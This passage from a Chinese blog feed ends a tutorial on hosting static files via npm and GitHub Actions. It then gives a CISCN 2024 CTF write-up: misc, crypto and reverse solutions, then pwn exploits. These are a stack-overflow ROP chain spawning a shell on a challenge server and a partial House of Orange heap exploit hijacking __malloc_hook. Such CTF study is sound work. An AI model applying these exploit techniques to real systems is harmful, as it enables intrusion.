<h3 id="配置npm的token"><a href="#配置npm的token" class="headerlink" title="配置npm的token"></a>配置npm的token</h3><div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/126569/20/27063/115924/634eafd8Ef582b1af/228ae7cb7ea2e7c1.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/126569/20/27063/115924/634eafd8Ef582b1af/228ae7cb7ea2e7c1.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/126569/20/27063/115924/634eafd8Ef582b1af/228ae7cb7ea2e7c1.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/23452/20/18663/55328/634eafecE6361464e/da3e05f531d027c4.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/23452/20/18663/55328/634eafecE6361464e/da3e05f531d027c4.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/23452/20/18663/55328/634eafecE6361464e/da3e05f531d027c4.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p><code>Name</code>填写<code>NPM_TOKEN</code>，<code>Value</code>填写你刚刚在npm获取的token</p>
<h2 id="本地修改并push至GitHub仓库"><a href="#本地修改并push至GitHub仓库" class="headerlink" title="本地修改并push至GitHub仓库"></a>本地修改并push至GitHub仓库</h2><p>电脑环境要求：<a href="https://nodejs.org/en/">Nodejs</a>，<a href="https://git-scm.com/downloads">Git</a>。如果没有的话还请自行搜索安装。<br>在某一个目录下打开Git Bash，输入以下命令</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:[UserName]/[RepoName].git</span><br><span class="line"><span class="comment">#或者</span></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/[UserName]/[RepoName].git</span><br></pre></td></tr></tbody></table></figure>

<p><code>UserName</code>为你的用户名，<code>RepoName</code>为方才创建的仓库名。</p>
<p>完成这一步之后需要对仓库进行npm的初始化：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">npm init</span><br></pre></td></tr></tbody></table></figure>

<table>
<thead>
<tr>
<th>参数名</th>
<th>参数值</th>
</tr>
</thead>
<tbody><tr>
<td>package name</td>
<td>不能和npm已有包名重复，建议使用用户名-仓库名的方式避免重复</td>
</tr>
<tr>
<td>version</td>
<td>版本号，默认即可</td>
</tr>
<tr>
<td>description</td>
<td>对包的描述</td>
</tr>
<tr>
<td>entry point</td>
<td>默认即可</td>
</tr>
<tr>
<td>test command</td>
<td>默认即可</td>
</tr>
<tr>
<td>git repository</td>
<td>对应的Git仓库地址，默认</td>
</tr>
<tr>
<td>keywords</td>
<td>关键词，可留空</td>
</tr>
<tr>
<td>author</td>
<td>包的作者，可以写你的用户名</td>
</tr>
<tr>
<td>license</td>
<td>默认即可</td>
</tr>
</tbody></table>
<p>输入完成后将为你生成<code>package.json</code>文件，输入yes后，在当前目录下可以看到。</p>
<p>接下来将你想要上传的文件复制到这个目录里来。在命令行输入：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># 将当前目录下的所有更改添加到缓存</span></span><br><span class="line">git add .</span><br><span class="line"><span class="comment"># 提交更改</span></span><br><span class="line">git commit -m <span class="string">"描述"</span></span><br><span class="line"><span class="comment"># 更新package版本号</span></span><br><span class="line">npm version patch</span><br><span class="line"><span class="comment"># 推送至github触发action</span></span><br><span class="line">git push</span><br></pre></td></tr></tbody></table></figure>

<p>等待push完成后，可以在GitHub检查一下Action是否成功运行，如果成功运行，npm将会给你发邮件通知包的发布情况。</p>
<h2 id="查看资源"><a href="#查看资源" class="headerlink" title="查看资源"></a>查看资源</h2><p>例如我创建的包名为<code>bf-static</code>，在相应的根目录下我创建了一个<code>logo.png</code>。我可以通过以下链接进行访问：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line"># unpkg</span><br><span class="line">https://unpkg.com/bf-static/logo.png</span><br><span class="line"># eleme国内镜像</span><br><span class="line">https://npm.elemecdn.com/bf-static/logo.png</span><br></pre></td></tr></tbody></table></figure>

<p>相应地改成你的包名、文件路径和文件名即可。</p>
]]></content>
      <categories>
        <category>前端</category>
      </categories>
      <tags>
        <tag>npm</tag>
        <tag>GitHub</tag>
        <tag>Actions</tag>
      </tags>
  </entry>
  <entry>
    <title>第十七届全国大学生信息安全竞赛创新实践能力赛初赛 Writeup</title>
    <url>/posts/ciscn-2024-wp/</url>
    <content><![CDATA[<p>梦开始的比赛。去年纯小白直接参赛，结果自然是被血虐。之后开始慢慢学，今年总算是做出些题。不过难一些的 PWN 题还是做不出……（ ），就多练。</p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="火锅链观光打卡"><a href="#火锅链观光打卡" class="headerlink" title="火锅链观光打卡"></a>火锅链观光打卡</h3><p>签到题。</p>
<p>浏览器安装一个 MetaMask 钱包用于区块链操作。连接钱包后答题，收集任意7个不同食材图片后，点击兑换 NFT ，得到含 flag 的图片:<br><img src="https://bu.dusays.com/2024/05/20/664abdea520d8.jpeg" class="lazyload" data-srcset="https://bu.dusays.com/2024/05/20/664abdea520d8.jpeg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="hotpot"><br>得到 flag ：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{y0u_ar3_hotpot_K1ng}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="Power-Trajectory-Diagram"><a href="#Power-Trajectory-Diagram" class="headerlink" title="Power_Trajectory_Diagram"></a>Power_Trajectory_Diagram</h3><p>这是一道基于功耗分析的侧信道攻击题，搜索相关关键词，在看雪上找到一篇<a href="https://bbs.kanxue.com/thread-260429.htm">文章</a>。根据文章内容可知，输入密码逐位比对，输入正确时和错误时功耗曲线有明显不同。</p>
<p>将得到的 npz 加载后打印数据，发现一共有13*40组数据，40对应着40个字符，猜测13为密码位数。打印所有功耗曲线，可以发现：<br><img src="https://bu.dusays.com/2024/05/20/664abe102daf5.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/05/20/664abe102daf5.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="trace36"><br><img src="https://bu.dusays.com/2024/05/20/664abe1fcc283.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/05/20/664abe1fcc283.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="trace37"><br>每40组曲线中，会有一组曲线的最大波动处横坐标明显右移，例如上图第37组曲线最大波动处相比于第36组以及其他1-40组的最大波动处都有一定程度右移。推测是密码错误时会出现最大波动，而第37组最大波动右移代表着当前输入的密码字符是正确的，错误发生在下一位。<br>使用这种方法可以找到每40组曲线中最特殊的一组，并映射为相应的字符。（除了第481组到第520组，因此认为密码只有12位)<br>特殊曲线到字符的映射脚本如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">data = [<span class="string">'a'</span>, <span class="string">'b'</span>, <span class="string">'c'</span>, <span class="string">'d'</span>, <span class="string">'e'</span>, <span class="string">'f'</span>, <span class="string">'g'</span>, <span class="string">'h'</span>, <span class="string">'i'</span>, <span class="string">'j'</span>, <span class="string">'k'</span>, <span class="string">'l'</span>, <span class="string">'m'</span>, <span class="string">'n'</span>, <span class="string">'o'</span>, <span class="string">'p'</span>, <span class="string">'q'</span>, <span class="string">'r'</span>,</span><br><span class="line"><span class="string">'s'</span>, <span class="string">'t'</span>, <span class="string">'u'</span>, <span class="string">'v'</span>, <span class="string">'w'</span>, <span class="string">'x'</span>, <span class="string">'y'</span>, <span class="string">'z'</span>, <span class="string">'0'</span>, <span class="string">'1'</span>, <span class="string">'2'</span>, <span class="string">'3'</span>, <span class="string">'4'</span>, <span class="string">'5'</span>, <span class="string">'6'</span>, <span class="string">'7'</span>, <span class="string">'8'</span>, <span class="string">'9'</span>,</span><br><span class="line"><span class="string">'_'</span>, <span class="string">'!'</span>, <span class="string">'@'</span>, <span class="string">'#'</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = [</span><br><span class="line"><span class="number">37</span>,</span><br><span class="line"><span class="number">43</span>,</span><br><span class="line"><span class="number">89</span>,</span><br><span class="line"><span class="number">139</span>,</span><br><span class="line"><span class="number">163</span>,</span><br><span class="line"><span class="number">214</span>,</span><br><span class="line"><span class="number">277</span>,</span><br><span class="line"><span class="number">309</span>,</span><br><span class="line"><span class="number">347</span>,</span><br><span class="line"><span class="number">389</span>,</span><br><span class="line"><span class="number">431</span>,</span><br><span class="line"><span class="number">477</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">password = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">12</span>):</span><br><span class="line">    tmp = <span class="built_in">list</span>[i] - i*<span class="number">40</span> -<span class="number">1</span></span><br><span class="line">    <span class="built_in">print</span>(tmp)</span><br><span class="line">    password += data[tmp]</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(password)</span><br></pre></td></tr></tbody></table></figure>
<p>得到结果<code>_ciscn_2024_</code>，因此 flag 为：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{_ciscn_2024_}</span><br></pre></td></tr></tbody></table></figure>

<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="古典密码"><a href="#古典密码" class="headerlink" title="古典密码"></a>古典密码</h3><p>题目给了一个字符串<code>AnU7NnR4NassOGp3BDJgAGonMaJayTwrBqZ3ODMoMWxgMnFdNqtdMTM9</code>，没有说明经过何种处理。<br>放到 <a href="https://gchq.github.io/CyberChef/#recipe=Atbash_Cipher()From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=QW5VN05uUjROYXNzT0dwM0JESmdBR29uTWFKYXlUd3JCcVozT0RNb01XeGdNbkZkTnF0ZE1UTTk">CyberChef</a> 选择 Encrption / Encoding 逐个尝试，用 Atbash Cipher 解密后 Base64 解码，得到：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">fa{2b838a-97ad-e9f743lgbb07-ce47-6e02804c}</span><br></pre></td></tr></tbody></table></figure>
<p>根据题目的提示想到栅栏密码，将字符串对半分，然后Z形拼接就能得到 flag：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{b2bb0873-8cae-4977-a6de-0e298f0744c3}</span><br></pre></td></tr></tbody></table></figure>

<h2 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h2><h3 id="gdb-debug"><a href="#gdb-debug" class="headerlink" title="gdb_debug"></a>gdb_debug</h3><p>IDA反编译，注意到程序中设置随机数种子的代码：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line">v3 = time(<span class="number">0LL</span>);</span><br><span class="line">srand(v3 &amp; <span class="number">0xF0000000</span>);</span><br></pre></td></tr></tbody></table></figure>
<p>实际上随机数种子恒为0x60000000，因此该程序中的随机数都可以确定，可以使用 ctypes 来调用 libc 库设置相应的随机数种子，获取每一次调用 <code>rand()</code> 返回的随机数。剩下的就是根据反编译的程序使用 z3 进行约束求解，exp 如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">libc = CDLL(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">libc.srand(<span class="number">0x60000000</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Initialization</span></span><br><span class="line">flag_len = <span class="number">38</span></span><br><span class="line">solver = Solver()</span><br><span class="line"></span><br><span class="line"><span class="comment"># Create a list of BitVec variables to represent the flag</span></span><br><span class="line">flag_chars = [BitVec(<span class="string">f'flag_<span class="subst">{i}</span>'</span>, <span class="number">8</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len)]</span><br><span class="line"></span><br><span class="line"><span class="comment"># Add constraints</span></span><br><span class="line">solver.add(flag_chars[<span class="number">0</span>] == <span class="built_in">ord</span>(<span class="string">'f'</span>))</span><br><span class="line">solver.add(flag_chars[<span class="number">1</span>] == <span class="built_in">ord</span>(<span class="string">'l'</span>))</span><br><span class="line">solver.add(flag_chars[<span class="number">2</span>] == <span class="built_in">ord</span>(<span class="string">'a'</span>))</span><br><span class="line">solver.add(flag_chars[<span class="number">3</span>] == <span class="built_in">ord</span>(<span class="string">'g'</span>))</span><br><span class="line">solver.add(flag_chars[<span class="number">4</span>] == <span class="built_in">ord</span>(<span class="string">'{'</span>))</span><br><span class="line">solver.add(flag_chars[flag_len-<span class="number">1</span>] == <span class="built_in">ord</span>(<span class="string">'}'</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 1: XOR with rand</span></span><br><span class="line">v28 = [BitVec(<span class="string">f'v28_<span class="subst">{i}</span>'</span>, <span class="number">8</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len)]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len):</span><br><span class="line">    random_val = libc.rand() &amp; <span class="number">0xff</span></span><br><span class="line">    solver.add(v28[i] == flag_chars[i] ^ random_val)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 2: Shuffle array s</span></span><br><span class="line">ptr = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len)]</span><br><span class="line">k = flag_len - <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> k &gt;= <span class="number">0</span>:</span><br><span class="line">    v18 = (libc.rand() % (k + <span class="number">1</span>)) &amp; <span class="number">0xff</span></span><br><span class="line">    v19 = ptr[k]</span><br><span class="line">    ptr[k] = ptr[v18]</span><br><span class="line">    ptr[v18] = v19</span><br><span class="line">    k -= <span class="number">1</span></span><br><span class="line"></span><br><span class="line">val1 = [</span><br><span class="line"><span class="number">0xd8</span>, <span class="number">0xe0</span>, <span class="number">0x19</span>, <span class="number">0xe8</span>, <span class="number">0xcd</span>, <span class="number">0x9f</span>, <span class="number">0x6d</span>, <span class="number">0x65</span>,</span><br><span class="line"><span class="number">0xb8</span>, <span class="number">0x11</span>, <span class="number">0x81</span>, <span class="number">0xc8</span>, <span class="number">0x6e</span>, <span class="number">0xd0</span>, <span class="number">0xdb</span>, <span class="number">0xf8</span>,</span><br><span class="line"><span class="number">0x6b</span>, <span class="number">0xf9</span>, <span class="number">0x7d</span>, <span class="number">0xd2</span>, <span class="number">0xd6</span>, <span class="number">0xd5</span>, <span class="number">0x0f</span>, <span class="number">0x89</span>,</span><br><span class="line"><span class="number">0x1e</span>, <span class="number">0x34</span>, <span class="number">0x6a</span>, <span class="number">0xc5</span>, <span class="number">0xfd</span>, <span class="number">0xc1</span>, <span class="number">0xe9</span>, <span class="number">0x26</span>,</span><br><span class="line"><span class="number">0xd0</span>, <span class="number">0xba</span>, <span class="number">0xfa</span>, <span class="number">0x99</span>, <span class="number">0xe7</span>, <span class="number">0x06</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">val2 = [<span class="number">0x6</span>, <span class="number">0x4a</span>, <span class="number">0x5b</span>, <span class="number">0x14</span>, <span class="number">0xc4</span>, <span class="number">0x77</span>, <span class="number">0xdf</span>, <span class="number">0x63</span>, <span class="number">0xb5</span>, <span class="number">0x82</span>, <span class="number">0xe0</span>, <span class="number">0x3c</span>, <span class="number">0x4a</span>, <span class="number">0x99</span>, <span class="number">0xce</span>, <span class="number">0xf9</span>, <span class="number">0xbc</span>, <span class="number">0x52</span>, <span class="number">0x79</span>, <span class="number">0xca</span>, <span class="number">0x19</span>, <span class="number">0x3c</span>, <span class="number">0xda</span>, <span class="number">0x1f</span>, <span class="number">0x2d</span>, <span class="number">0xfe</span>, <span class="number">0x93</span>, <span class="number">0xef</span>, <span class="number">0xa3</span>, <span class="number">0x2b</span>, <span class="number">0xc4</span>, <span class="number">0x1a</span>, <span class="number">0x44</span>, <span class="number">0xd5</span>, <span class="number">0xc2</span>, <span class="number">0x4</span>, <span class="number">0xbf</span>, <span class="number">0xec</span>]</span><br><span class="line"></span><br><span class="line">random_vals = [<span class="number">0</span>] * flag_len</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len):</span><br><span class="line">    random_vals[i] = val1[i] ^ val2[i]</span><br><span class="line"></span><br><span class="line"><span class="comment"># *((_BYTE *)v31 + m) = *((_BYTE *)v28 + *((unsigned __int8 *)ptr + m));</span></span><br><span class="line">v31 = [BitVec(<span class="string">f'v31_<span class="subst">{i}</span>'</span>, <span class="number">8</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len)]</span><br><span class="line"><span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(flag_len):</span><br><span class="line">    solver.add(v31[m] == (v28[ptr[m]] ) ^ (random_vals[m]) &amp; <span class="number">0xff</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># s1[ii] = *((_BYTE *)v31 + ii) ^ v32[ii];</span></span><br><span class="line">v32 = [<span class="number">0xBF</span>, <span class="number">0xD7</span>, <span class="number">0x2E</span>, <span class="number">0xDA</span>, <span class="number">0xEE</span>, <span class="number">0xA8</span>, <span class="number">0x1A</span>, <span class="number">0x10</span>, <span class="number">0x83</span>, <span class="number">0x73</span>, <span class="number">0xAC</span>, <span class="number">0xF1</span>, <span class="number">0x06</span>, <span class="number">0xBE</span>, <span class="number">0xAD</span>, <span class="number">0x88</span>, <span class="number">0x04</span>, <span class="number">0xD7</span>, <span class="number">0x12</span>, <span class="number">0xFE</span>, <span class="number">0xB5</span>, <span class="number">0xE2</span>, <span class="number">0x61</span>, <span class="number">0xB7</span>, <span class="number">0x3D</span>, <span class="number">0x07</span>, <span class="number">0x4A</span>, <span class="number">0xE8</span>, <span class="number">0x96</span>, <span class="number">0xA2</span>, <span class="number">0x9D</span>, <span class="number">0x4D</span>, <span class="number">0xBC</span>, <span class="number">0x81</span>, <span class="number">0x8C</span>, <span class="number">0xE9</span>, <span class="number">0x88</span>, <span class="number">0x78</span>]</span><br><span class="line">s1 = [BitVec(<span class="string">f's1_<span class="subst">{i}</span>'</span>, <span class="number">8</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len)]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len):</span><br><span class="line">    solver.add(s1[i] == v31[i] ^ v32[i])</span><br><span class="line"></span><br><span class="line">s2 = <span class="string">"congratulationstoyoucongratulationstoy"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len):</span><br><span class="line">    solver.add(s1[i] == <span class="built_in">ord</span>(s2[i]))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> solver.check() == sat:</span><br><span class="line">    model = solver.model()</span><br><span class="line">    flag = <span class="string">''</span>.join([<span class="built_in">chr</span>(model[flag_chars[i]].as_long()) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(flag_len)])</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f'flag: <span class="subst">{flag}</span>'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">'unsat'</span>)</span><br></pre></td></tr></tbody></table></figure>
<p>其中第三次获取38个随机数时，我使用 ctypes 得到的随机数与实际的随机数不符，因此直接在 gdb 中打印 v31 这个数组在与随机数异或前后的值，得到第三轮的38个随机数。不清楚是什么导致了这种差异，但或许这就是题目提示“动静结合”的原因？<br>最后得到flag：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{78bace5989660ee38f1fd980a4b4fbcd}</span><br></pre></td></tr></tbody></table></figure>

<h2 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h2><h3 id="gostack"><a href="#gostack" class="headerlink" title="gostack"></a>gostack</h3><p>一道简单的栈溢出+ROP题目，一开始被 golang 唬住了，逆向了一会儿没找到缓冲区的大小，然后直接在 gdb 中看就清楚多了。<br>首先checksec：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x400000)</span><br></pre></td></tr></tbody></table></figure>
<p>有栈溢出 + 没有canary + 没有PIE + gadgets = 简单 ROP<br>找到要用的gadgets，构造 ROP chain ；在 gdb 中计算出缓冲区开头与返回地址的距离为0x1d0字节，加上填充就得到 payload。exp 如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.binary = binary = ELF(<span class="string">'./gostack'</span>)</span><br><span class="line"><span class="comment"># context.log_level = 'critical'</span></span><br><span class="line"></span><br><span class="line">syscall = <span class="number">0x0000000000404043</span></span><br><span class="line">pop_rax = <span class="number">0x000000000040f984</span></span><br><span class="line">pop_rsi = <span class="number">0x000000000042138a</span></span><br><span class="line">pop_rdx = <span class="number">0x00000000004944ec</span></span><br><span class="line">pop_rdi_r14_r13_r12_rbp_rbx = <span class="number">0x00000000004a18a5</span></span><br><span class="line">read_func = <span class="number">0x46178d</span></span><br><span class="line">bss = binary.bss()</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = binary.process()</span></span><br><span class="line">p = remote(<span class="string">'8.147.129.254'</span>, <span class="number">29507</span>)</span><br><span class="line"><span class="comment"># read(0, bss, 0x100)</span></span><br><span class="line">rop_chain = flat(pop_rdi_r14_r13_r12_rbp_rbx, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, pop_rsi, bss, pop_rdx, <span class="number">8</span>, read_func)</span><br><span class="line"><span class="comment"># execve(bss, 0, 0)</span></span><br><span class="line">rop_chain += flat(pop_rdi_r14_r13_r12_rbp_rbx, bss, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, pop_rsi, <span class="number">0</span>, pop_rdx, <span class="number">0</span>, pop_rax, <span class="number">59</span>, syscall)</span><br><span class="line">payload = <span class="string">b'\x00'</span> * <span class="number">0x1d0</span> + rop_chain</span><br><span class="line">payload = payload.ljust(<span class="number">0x1000</span>, <span class="string">b'\x00'</span>)</span><br><span class="line">p.recvuntil(<span class="string">b'message :'</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p, '''b *0x4a0a9e''')</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(<span class="string">b'message :'</span>)</span><br><span class="line">p.sendline(<span class="string">b'/bin/sh\x00'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></tbody></table></figure>
<p>有 <code>syscall</code> 但是没有 <code>syscall ; ret</code> ，因此我们的 ROP chain 最多只能有一次 raw syscall ，因此 read 选择使用函数地址而不是 raw syscall。get shell 之后得到 flag ：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{08c559f9-81f7-4c74-a983-9eb59502de34}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="orange-cat-diary"><a href="#orange-cat-diary" class="headerlink" title="orange_cat_diary"></a>orange_cat_diary</h3><p>首先用 IDA 反编译程序，在程序中发现以下漏洞：</p>
<ol>
<li>heap overflow（8字节的溢出）</li>
<li>UAF（只能使用一次，因为只能 delete 一次）<ul>
<li>write after free</li>
<li>read after free</li>
</ul>
</li>
</ol>
<p>再根据题目名称的提示可以知道，可以使用 <a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c">House of Orange</a> 进行攻击（利用 heap overflow 和 read after free），泄露出 libc 地址和堆地址。由于 libc 的版本为2.23，因此最简便的方法就是劫持 <code>__malloc_hook</code> 。使用 pwndbg 的 <code>find_fake_fast</code> 命令找到用于覆盖 <code>__malloc_hook</code> 内容的 fast bin 地址，然后利用 write after free 劫持 fast bin ，使其返回该 chunk ，然后将<code>__realloc_hook</code>写为<code>one_gadget</code>，将<code>__malloc_hook</code>写为<code>realloc</code>，这样做更容易满足<code>one_gadget</code>条件。<br>利用代码如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># all protections are enabled</span></span><br><span class="line"><span class="comment"># heap overflow</span></span><br><span class="line"><span class="comment"># we can only use show and delete once</span></span><br><span class="line"></span><br><span class="line">context.binary = binary = ELF(<span class="string">'./orange_cat_diary'</span>)</span><br><span class="line">libc = binary.libc</span><br><span class="line"><span class="comment"># context.log_level = 'critical'</span></span><br><span class="line"></span><br><span class="line">libc_offset = <span class="number">0x3c5158</span></span><br><span class="line">malloc_hook_offset = <span class="number">0x3c4b10</span></span><br><span class="line">one_gadget_offset = <span class="number">0xf1247</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># p = binary.process()</span></span><br><span class="line">p = remote(<span class="string">'8.147.129.254'</span>, <span class="number">25553</span>)</span><br><span class="line">p.recvuntil(<span class="string">b'Please tell me your name.\n'</span>)</span><br><span class="line">p.sendline(<span class="string">b'BeaCox'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>():</span><br><span class="line">    p.recvuntil(<span class="string">b'###orange_cat_diary###'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'Please input your choice:'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size, content</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'Please input the length of the diary content:'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    p.recvuntil(<span class="string">b'Please enter the diary content:\n'</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>():</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'2'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>():</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'3'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">size, content</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'4'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'Please input the length of the diary content:'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    p.recvuntil(<span class="string">b'Please enter the diary content:\n'</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line"><span class="comment"># House of Orange</span></span><br><span class="line">add(<span class="number">0x400</span>-<span class="number">8</span>, <span class="string">b'A'</span>*(<span class="number">0x400</span>-<span class="number">16</span>) + p64(<span class="number">0x0</span>))</span><br><span class="line">payload = <span class="string">b'A'</span>*(<span class="number">0x400</span>-<span class="number">16</span>) + p64(<span class="number">0x0</span>) + p64(<span class="number">0xc01</span>)</span><br><span class="line">edit(<span class="number">0x400</span>, payload)</span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">b'\n'</span>)</span><br><span class="line">add(<span class="number">0x68</span>, <span class="string">b'\n'</span>)</span><br><span class="line">show()</span><br><span class="line">p.recv(<span class="number">8</span>)</span><br><span class="line">libc_leak = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">info(<span class="string">f'libc_leak: <span class="subst">{<span class="built_in">hex</span>(libc_leak)}</span>'</span>)</span><br><span class="line">libc.address = libc_leak - libc_offset</span><br><span class="line">info(<span class="string">f'libc_base: <span class="subst">{<span class="built_in">hex</span>(libc.address)}</span>'</span>)</span><br><span class="line">malloc_hook_addr = libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">info(<span class="string">f'malloc_hook_addr: <span class="subst">{<span class="built_in">hex</span>(malloc_hook_addr)}</span>'</span>)</span><br><span class="line">fake_bin_addr = malloc_hook_addr - <span class="number">0x23</span></span><br><span class="line">heap_leak = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">info(<span class="string">f'heap_leak: <span class="subst">{<span class="built_in">hex</span>(heap_leak)}</span>'</span>)</span><br><span class="line">one_gadget = libc.address + 